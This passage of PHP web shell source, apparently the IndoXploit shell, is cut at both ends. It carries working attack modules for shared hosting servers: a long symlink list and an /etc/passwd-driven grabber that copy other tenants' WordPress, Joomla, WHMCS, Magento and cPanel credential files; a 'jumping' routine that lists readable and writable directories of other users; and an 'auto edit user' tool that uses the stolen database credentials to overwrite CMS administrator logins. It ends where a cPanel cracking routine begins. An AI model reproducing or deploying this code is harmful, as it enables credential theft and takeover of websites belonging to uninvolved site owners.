symlink('/var/www/vhosts/'.$sitess.'/httpdocs/shop/includes/configure.php',$sitess.'-shop2.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/shopping/includes/configure.php',$sitess.'-shop-shopping.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/sale/includes/configure.php',$sitess.'-sale.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/amember/config.inc.php',$sitess.'-amember.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/config.inc.php',$sitess.'-amember2.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/members/configuration.php',$sitess.'-members.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/config.php',$sitess.'-4images1.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/forum/includes/config.php',$sitess.'-forum.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/forums/includes/config.php',$sitess.'-forums.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/admin/conf.php',$sitess.'-5.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/admin/config.php',$sitess.'-4.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/wp-config.php',$sitess.'-Wordpress.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/wp/wp-config.php',$sitess.'-Wordpress.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/WP/wp-config.php',$sitess.'-Wordpress.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/wp/beta/wp-config.php',$sitess.'-Wordpress.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/beta/wp-config.php',$sitess.'-Wordpress.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/press/wp-config.php',$sitess.'-wp13-press.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/wordpress/wp-config.php',$sitess.'-wordpress.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/Wordpress/wp-config.php',$sitess.'-Wordpress.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/blog/wp-config.php',$sitess.'-Wordpress.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/wordpress/beta/wp-config.php',$sitess.'-Wordpress.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/news/wp-config.php',$sitess.'-Wordpress-news.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/new/wp-config.php',$sitess.'-Wordpress-new.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/blog/wp-config.php',$sitess.'-Wordpress-blog.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/beta/wp-config.php',$sitess.'-Wordpress-beta.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/blogs/wp-config.php',$sitess.'-Wordpress-blogs.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/home/wp-config.php',$sitess.'-Wordpress-home.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/protal/wp-config.php',$sitess.'-Wordpress-protal.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/site/wp-config.php',$sitess.'-Wordpress-site.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/main/wp-config.php',$sitess.'-Wordpress-main.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/test/wp-config.php',$sitess.'-Wordpress-test.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/arcade/functions/dbclass.php',$sitess.'-ibproarcade.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/arcade/functions/dbclass.php',$sitess.'-ibproarcade.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/joomla/configuration.php',$sitess.'-joomla2.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/protal/configuration.php',$sitess.'-joomla-protal.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/joo/configuration.php',$sitess.'-joo.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/cms/configuration.php',$sitess.'-joomla-cms.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/site/configuration.php',$sitess.'-joomla-site.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/main/configuration.php',$sitess.'-joomla-main.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/news/configuration.php',$sitess.'-joomla-news.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/new/configuration.php',$sitess.'-joomla-new.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/home/configuration.php',$sitess.'-joomla-home.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/vb/includes/config.php',$sitess.'-vb~config.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/vb3/includes/config.php',$sitess.'-vb3~config.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/cc/includes/config.php',$sitess.'-vb1~config.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/forum/includes/class_core.php',$sitess.'-vbluttin~class_core.php.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/vb/includes/class_core.php',$sitess.'-vbluttin~class_core.php1.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/cc/includes/class_core.php',$sitess.'-vbluttin~class_core.php2.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/whm/configuration.php',$sitess.'-whm15.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/central/configuration.php',$sitess.'-whm-central.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/whm/whmcs/configuration.php',$sitess.'-whm-whmcs.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/whm/WHMCS/configuration.php',$sitess.'-whm-WHMCS.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/whmc/WHM/configuration.php',$sitess.'-whmc-WHM.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/whmcs/configuration.php',$sitess.'-whmcs.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/support/configuration.php',$sitess.'-support.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/supp/configuration.php',$sitess.'-supp.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/secure/configuration.php',$sitess.'-sucure.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/secure/whm/configuration.php',$sitess.'-sucure-whm.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/secure/whmcs/configuration.php',$sitess.'-sucure-whmcs.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/cpanel/configuration.php',$sitess.'-cpanel.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/panel/configuration.php',$sitess.'-panel.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/host/configuration.php',$sitess.'-host.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/hosting/configuration.php',$sitess.'-hosting.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/hosts/configuration.php',$sitess.'-hosts.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/configuration.php',$sitess.'-joomla.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/submitticket.php',$sitess.'-whmcs2.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/clients/configuration.php',$sitess.'-clients.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/client/configuration.php',$sitess.'-client.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/clientes/configuration.php',$sitess.'-clientes.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/cliente/configuration.php',$sitess.'-client.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/clientsupport/configuration.php',$sitess.'-clientsupport.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/billing/configuration.php',$sitess.'-billing.txt'); 
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/manage/configuration.php',$sitess.'-whm-manage.txt'); 
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/my/configuration.php',$sitess.'-whm-my.txt'); 
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/myshop/configuration.php',$sitess.'-whm-myshop.txt'); 
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/includes/dist-configure.php',$sitess.'-zencart.txt'); 
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/zencart/includes/dist-configure.php',$sitess.'-shop-zencart.txt'); 
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/shop/includes/dist-configure.php',$sitess.'-shop-ZCshop.txt'); 
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/Settings.php',$sitess.'-smf.txt'); 
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/smf/Settings.php',$sitess.'-smf2.txt'); 
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/forum/Settings.php',$sitess.'-smf-forum.txt'); 
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/forums/Settings.php',$sitess.'-smf-forums.txt'); 
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/upload/includes/config.php',$sitess.'-up.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/article/config.php',$sitess.'-Nwahy.txt'); 
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/up/includes/config.php',$sitess.'-up2.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/conf_global.php',$sitess.'-6.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/include/db.php',$sitess.'-7.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/connect.php',$sitess.'-PHP-Fusion.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/mk_conf.php',$sitess.'-9.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/config.php',$sitess.'-4images.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/sites/default/settings.php',$sitess.'-Drupal.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/member/configuration.php',$sitess.'-1member.txt') ; 
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/billings/configuration.php',$sitess.'-billings.txt') ; 
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/whm/configuration.php',$sitess.'-whm.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/supports/configuration.php',$sitess.'-supports.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/requires/config.php',$sitess.'-AM4SS-hosting.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/supports/includes/iso4217.php',$sitess.'-hostbills-supports.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/client/includes/iso4217.php',$sitess.'-hostbills-client.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/support/includes/iso4217.php',$sitess.'-hostbills-support.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/billing/includes/iso4217.php',$sitess.'-hostbills-billing.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/billings/includes/iso4217.php',$sitess.'-hostbills-billings.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/host/includes/iso4217.php',$sitess.'-hostbills-host.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/hosts/includes/iso4217.php',$sitess.'-hostbills-hosts.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/hosting/includes/iso4217.php',$sitess.'-hostbills-hosting.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/hostings/includes/iso4217.php',$sitess.'-hostbills-hostings.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/includes/iso4217.php',$sitess.'-hostbills.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/hostbillincludes/iso4217.php',$sitess.'-hostbills-hostbills.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/includes/iso4217.php',$sitess.'-hostbills-hostbill.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/app/etc/local.xml',$sitess.'-Magento.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/admin/config.php',$sitess.'-Opencart.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/config/settings.inc.php',$sitess.'-Prestashop.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/config/koneksi.php',$sitess.'-Lokomedia.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/lokomedia/config/koneksi.php',$sitess.'-Lokomedia.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/slconfig.php',$sitess.'-Sitelock.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/application/config/database.php',$sitess.'-Ellislab.txt');
}
print "Location: ./\n\n";";
  562. $file = "idx_config/vhost.cin";
  563. $handle = fopen($file ,"w+");
  564. fwrite($handle ,base64_decode($vhost));
  565. fclose($handle);
  566. chmod($file, 0755);
  567. if(exe("cd idx_config && ./vhost.cin")) {
  568. echo "<center><a href='$link_config/idx_config'><font color=lime>Done</font></a></center>";
  569. } else {
  570. echo "<center><a href='$link_config/idx_config/vhost.cin'><font color=lime>Done</font></a></center>";
  571. }
  572.  
  573. } else {
  574. $etc = fopen("/etc/passwd", "r") or die("<pre><font color=red>Can't read /etc/passwd</font></pre>");
  575. while($passwd = fgets($etc)) {
  576. if($passwd == "" || !$etc) {
  577. echo "<font color=red>Can't read /etc/passwd</font>";
  578. } else {
  579. preg_match_all('/(.*?):x:/', $passwd, $user_config);
  580. foreach($user_config[1] as $user_idx) {
  581. $user_config_dir = "/home/$user_idx/public_html/";
  582. if(is_readable($user_config_dir)) {
  583. $grab_config = array(
  584. "/home/$user_idx/.my.cnf" => "cpanel",
  585. "/home/$user_idx/.accesshash" => "WHM-accesshash",
  586. "$user_config_dir/po-content/config.php" => "Popoji",
  587. "$user_config_dir/vdo_config.php" => "Voodoo",
  588. "$user_config_dir/bw-configs/config.ini" => "BosWeb",
  589. "$user_config_dir/config/koneksi.php" => "Lokomedia",
  590. "$user_config_dir/lokomedia/config/koneksi.php" => "Lokomedia",
  591. "$user_config_dir/clientarea/configuration.php" => "WHMCS",
  592. "$user_config_dir/whm/configuration.php" => "WHMCS",
  593. "$user_config_dir/whmcs/configuration.php" => "WHMCS",
  594. "$user_config_dir/forum/config.php" => "phpBB",
  595. "$user_config_dir/sites/default/settings.php" => "Drupal",
  596. "$user_config_dir/config/settings.inc.php" => "PrestaShop",
  597. "$user_config_dir/app/etc/local.xml" => "Magento",
  598. "$user_config_dir/joomla/configuration.php" => "Joomla",
  599. "$user_config_dir/configuration.php" => "Joomla",
  600. "$user_config_dir/wp/wp-config.php" => "WordPress",
  601. "$user_config_dir/wordpress/wp-config.php" => "WordPress",
  602. "$user_config_dir/wp-config.php" => "WordPress",
  603. "$user_config_dir/admin/config.php" => "OpenCart",
  604. "$user_config_dir/slconfig.php" => "Sitelok",
  605. "$user_config_dir/application/config/database.php" => "Ellislab");
  606. foreach($grab_config as $config => $nama_config) {
  607. $ambil_config = file_get_contents($config);
  608. if($ambil_config == '') {
  609. } else {
  610. $file_config = fopen("idx_config/$user_idx-$nama_config.txt","w");
  611. fputs($file_config,$ambil_config);
  612. }
  613. }
  614. }
  615. }
  616. }
  617. }
  618. echo "<center><a href='?dir=$dir/idx_config'><font color=lime>Done</font></a></center>";
  619. }
  620. } elseif($_GET['do'] == 'jumping') {
  621. $i = 0;
  622. echo "<div class='margin: 5px auto;'>";
  623. if(preg_match("/hsphere/", $dir)) {
  624. $urls = explode("\r\n", $_POST['url']);
  625. if(isset($_POST['jump'])) {
  626. echo "<pre>";
  627. foreach($urls as $url) {
  628. $url = str_replace(array("http://","www."), "", strtolower($url));
  629. $etc = "/etc/passwd";
  630. $f = fopen($etc,"r");
  631. while($gets = fgets($f)) {
  632. $pecah = explode(":", $gets);
  633. $user = $pecah[0];
  634. $dir_user = "/hsphere/local/home/$user";
  635. if(is_dir($dir_user) === true) {
  636. $url_user = $dir_user."/".$url;
  637. if(is_readable($url_user)) {
  638. $i++;
  639. $jrw = "[<font color=lime>R</font>] <a href='?dir=$url_user'><font color=gold>$url_user</font></a>";
  640. if(is_writable($url_user)) {
  641. $jrw = "[<font color=lime>RW</font>] <a href='?dir=$url_user'><font color=gold>$url_user</font></a>";
  642. }
  643. echo $jrw."<br>";
  644. }
  645. }
  646. }
  647. }
  648. if($i == 0) {
  649. } else {
  650. echo "<br>Total ada ".$i." Kamar di ".$ip;
  651. }
  652. echo "</pre>";
  653. } else {
  654. echo '<center>
  655. <form method="post">
  656. List Domains: <br>
  657. <textarea name="url" style="width: 500px; height: 250px;">';
  658. $fp = fopen("/hsphere/local/config/httpd/sites/sites.txt","r");
  659. while($getss = fgets($fp)) {
  660. echo $getss;
  661. }
  662. echo '</textarea><br>
  663. <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
  664. </form></center>';
  665. }
  666. } elseif(preg_match("/vhosts|vhost/", $dir)) {
  667. preg_match("/\/var\/www\/(.*?)\//", $dir, $vh);
  668. $urls = explode("\r\n", $_POST['url']);
  669. if(isset($_POST['jump'])) {
  670. echo "<pre>";
  671. foreach($urls as $url) {
  672. $url = str_replace("www.", "", $url);
  673. $web_vh = "/var/www/".$vh[1]."/$url/httpdocs";
  674. if(is_dir($web_vh) === true) {
  675. if(is_readable($web_vh)) {
  676. $i++;
  677. $jrw = "[<font color=lime>R</font>] <a href='?dir=$web_vh'><font color=gold>$web_vh</font></a>";
  678. if(is_writable($web_vh)) {
  679. $jrw = "[<font color=lime>RW</font>] <a href='?dir=$web_vh'><font color=gold>$web_vh</font></a>";
  680. }
  681. echo $jrw."<br>";
  682. }
  683. }
  684. }
  685. if($i == 0) {
  686. } else {
  687. echo "<br>Total ada ".$i." Kamar di ".$ip;
  688. }
  689. echo "</pre>";
  690. } else {
  691. echo '<center>
  692. <form method="post">
  693. List Domains: <br>
  694. <textarea name="url" style="width: 500px; height: 250px;">';
  695. bing("ip:$ip");
  696. echo '</textarea><br>
  697. <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
  698. </form></center>';
  699. }
  700. } else {
  701. echo "<pre>";
  702. $etc = fopen("/etc/passwd", "r") or die("<font color=red>Can't read /etc/passwd</font>");
  703. while($passwd = fgets($etc)) {
  704. if($passwd == '' || !$etc) {
  705. echo "<font color=red>Can't read /etc/passwd</font>";
  706. } else {
  707. preg_match_all('/(.*?):x:/', $passwd, $user_jumping);
  708. foreach($user_jumping[1] as $user_idx_jump) {
  709. $user_jumping_dir = "/home/$user_idx_jump/public_html";
  710. if(is_readable($user_jumping_dir)) {
  711. $i++;
  712. $jrw = "[<font color=lime>R</font>] <a href='?dir=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
  713. if(is_writable($user_jumping_dir)) {
  714. $jrw = "[<font color=lime>RW</font>] <a href='?dir=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
  715. }
  716. echo $jrw;
  717. if(function_exists('posix_getpwuid')) {
  718. $domain_jump = file_get_contents("/etc/named.conf");
  719. if($domain_jump == '') {
  720. echo " => ( <font color=red>gabisa ambil nama domain nya</font> )<br>";
  721. } else {
  722. preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump);
  723. foreach($domains_jump[1] as $dj) {
  724. $user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
  725. $user_jumping_url = $user_jumping_url['name'];
  726. if($user_jumping_url == $user_idx_jump) {
  727. echo " => ( <u>$dj</u> )<br>";
  728. break;
  729. }
  730. }
  731. }
  732. } else {
  733. echo "<br>";
  734. }
  735. }
  736. }
  737. }
  738. }
  739. if($i == 0) {
  740. } else {
  741. echo "<br>Total ada ".$i." Kamar di ".$ip;
  742. }
  743. echo "</pre>";
  744. }
  745. echo "</div>";
  746. } elseif($_GET['do'] == 'auto_edit_user') {
  747. if($_POST['hajar']) {
  748. if(strlen($_POST['pass_baru']) < 6 OR strlen($_POST['user_baru']) < 6) {
  749. echo "username atau password harus lebih dari 6 karakter";
  750. } else {
  751. $user_baru = $_POST['user_baru'];
  752. $pass_baru = md5($_POST['pass_baru']);
  753. $conf = $_POST['config_dir'];
  754. $scan_conf = scandir($conf);
  755. foreach($scan_conf as $file_conf) {
  756. if(!is_file("$conf/$file_conf")) continue;
  757. $config = file_get_contents("$conf/$file_conf");
  758. if(preg_match("/JConfig|joomla/",$config)) {
  759. $dbhost = ambilkata($config,"host = '","'");
  760. $dbuser = ambilkata($config,"user = '","'");
  761. $dbpass = ambilkata($config,"password = '","'");
  762. $dbname = ambilkata($config,"db = '","'");
  763. $dbprefix = ambilkata($config,"dbprefix = '","'");
  764. $prefix = $dbprefix."users";
  765. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  766. $db = mysql_select_db($dbname);
  767. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  768. $result = mysql_fetch_array($q);
  769. $id = $result['id'];
  770. $site = ambilkata($config,"sitename = '","'");
  771. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE id='$id'");
  772. echo "Config => ".$file_conf."<br>";
  773. echo "CMS => Joomla<br>";
  774. if($site == '') {
  775. echo "Sitename => <font color=red>error, gabisa ambil nama domain nya</font><br>";
  776. } else {
  777. echo "Sitename => $site<br>";
  778. }
  779. if(!$update OR !$conn OR !$db) {
  780. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  781. } else {
  782. echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  783. }
  784. mysql_close($conn);
  785. } elseif(preg_match("/WordPress/",$config)) {
  786. $dbhost = ambilkata($config,"DB_HOST', '","'");
  787. $dbuser = ambilkata($config,"DB_USER', '","'");
  788. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  789. $dbname = ambilkata($config,"DB_NAME', '","'");
  790. $dbprefix = ambilkata($config,"table_prefix = '","'");
  791. $prefix = $dbprefix."users";
  792. $option = $dbprefix."options";
  793. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  794. $db = mysql_select_db($dbname);
  795. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  796. $result = mysql_fetch_array($q);
  797. $id = $result[ID];
  798. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  799. $result2 = mysql_fetch_array($q2);
  800. $target = $result2[option_value];
  801. if($target == '') {
  802. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  803. } else {
  804. $url_target = "Login => <a href='$target/wp-login.php' target='_blank'><u>$target/wp-login.php</u></a><br>";
  805. }
  806. $update = mysql_query("UPDATE $prefix SET user_login='$user_baru',user_pass='$pass_baru' WHERE id='$id'");
  807. echo "Config => ".$file_conf."<br>";
  808. echo "CMS => Wordpress<br>";
  809. echo $url_target;
  810. if(!$update OR !$conn OR !$db) {
  811. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  812. } else {
  813. echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  814. }
  815. mysql_close($conn);
  816. } elseif(preg_match("/Magento|Mage_Core/",$config)) {
  817. $dbhost = ambilkata($config,"<host><![CDATA[","]]></host>");
  818. $dbuser = ambilkata($config,"<username><![CDATA[","]]></username>");
  819. $dbpass = ambilkata($config,"<password><![CDATA[","]]></password>");
  820. $dbname = ambilkata($config,"<dbname><![CDATA[","]]></dbname>");
  821. $dbprefix = ambilkata($config,"<table_prefix><![CDATA[","]]></table_prefix>");
  822. $prefix = $dbprefix."admin_user";
  823. $option = $dbprefix."core_config_data";
  824. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  825. $db = mysql_select_db($dbname);
  826. $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
  827. $result = mysql_fetch_array($q);
  828. $id = $result[user_id];
  829. $q2 = mysql_query("SELECT * FROM $option WHERE path='web/secure/base_url'");
  830. $result2 = mysql_fetch_array($q2);
  831. $target = $result2[value];
  832. if($target == '') {
  833. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  834. } else {
  835. $url_target = "Login => <a href='$target/admin/' target='_blank'><u>$target/admin/</u></a><br>";
  836. }
  837. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
  838. echo "Config => ".$file_conf."<br>";
  839. echo "CMS => Magento<br>";
  840. echo $url_target;
  841. if(!$update OR !$conn OR !$db) {
  842. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  843. } else {
  844. echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  845. }
  846. mysql_close($conn);
  847. } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/",$config)) {
  848. $dbhost = ambilkata($config,"'DB_HOSTNAME', '","'");
  849. $dbuser = ambilkata($config,"'DB_USERNAME', '","'");
  850. $dbpass = ambilkata($config,"'DB_PASSWORD', '","'");
  851. $dbname = ambilkata($config,"'DB_DATABASE', '","'");
  852. $dbprefix = ambilkata($config,"'DB_PREFIX', '","'");
  853. $prefix = $dbprefix."user";
  854. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  855. $db = mysql_select_db($dbname);
  856. $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
  857. $result = mysql_fetch_array($q);
  858. $id = $result[user_id];
  859. $target = ambilkata($config,"HTTP_SERVER', '","'");
  860. if($target == '') {
  861. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  862. } else {
  863. $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a><br>";
  864. }
  865. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
  866. echo "Config => ".$file_conf."<br>";
  867. echo "CMS => OpenCart<br>";
  868. echo $url_target;
  869. if(!$update OR !$conn OR !$db) {
  870. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  871. } else {
  872. echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  873. }
  874. mysql_close($conn);
  875. } elseif(preg_match("/panggil fungsi validasi xss dan injection/",$config)) {
  876. $dbhost = ambilkata($config,'server = "','"');
  877. $dbuser = ambilkata($config,'username = "','"');
  878. $dbpass = ambilkata($config,'password = "','"');
  879. $dbname = ambilkata($config,'database = "','"');
  880. $prefix = "users";
  881. $option = "identitas";
  882. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  883. $db = mysql_select_db($dbname);
  884. $q = mysql_query("SELECT * FROM $option ORDER BY id_identitas ASC");
  885. $result = mysql_fetch_array($q);
  886. $target = $result[alamat_website];
  887. if($target == '') {
  888. $target2 = $result[url];
  889. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  890. if($target2 == '') {
  891. $url_target2 = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  892. } else {
  893. $cek_login3 = file_get_contents("$target2/adminweb/");
  894. $cek_login4 = file_get_contents("$target2/lokomedia/adminweb/");
  895. if(preg_match("/CMS Lokomedia|Administrator/", $cek_login3)) {
  896. $url_target2 = "Login => <a href='$target2/adminweb' target='_blank'><u>$target2/adminweb</u></a><br>";
  897. } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login4)) {
  898. $url_target2 = "Login => <a href='$target2/lokomedia/adminweb' target='_blank'><u>$target2/lokomedia/adminweb</u></a><br>";
  899. } else {
  900. $url_target2 = "Login => <a href='$target2' target='_blank'><u>$target2</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
  901. }
  902. }
  903. } else {
  904. $cek_login = file_get_contents("$target/adminweb/");
  905. $cek_login2 = file_get_contents("$target/lokomedia/adminweb/");
  906. if(preg_match("/CMS Lokomedia|Administrator/", $cek_login)) {
  907. $url_target = "Login => <a href='$target/adminweb' target='_blank'><u>$target/adminweb</u></a><br>";
  908. } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login2)) {
  909. $url_target = "Login => <a href='$target/lokomedia/adminweb' target='_blank'><u>$target/lokomedia/adminweb</u></a><br>";
  910. } else {
  911. $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
  912. }
  913. }
  914. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE level='admin'");
  915. echo "Config => ".$file_conf."<br>";
  916. echo "CMS => Lokomedia<br>";
  917. if(preg_match('/error, gabisa ambil nama domain nya/', $url_target)) {
  918. echo $url_target2;
  919. } else {
  920. echo $url_target;
  921. }
  922. if(!$update OR !$conn OR !$db) {
  923. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  924. } else {
  925. echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  926. }
  927. mysql_close($conn);
  928. }
  929. }
  930. }
  931. } else {
  932. echo "<center>
  933. <h1>Auto Edit User Config</h1>
  934. <form method='post'>
  935. DIR Config: <br>
  936. <input type='text' size='50' name='config_dir' value='$dir'><br><br>
  937. Set User & Pass: <br>
  938. <input type='text' name='user_baru' value='indoxploit' placeholder='user_baru'><br>
  939. <input type='text' name='pass_baru' value='indoxploit' placeholder='pass_baru'><br>
  940. <input type='submit' name='hajar' value='Hajar!' style='width: 215px;'>
  941. </form>
  942. <span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br>
  943. ";
  944. }
  945. } elseif($_GET['do'] == 'cpanel') {
  946. if($_POST['crack']) {
  947. $usercp = explode("\r\n", $_POST['user_cp']);
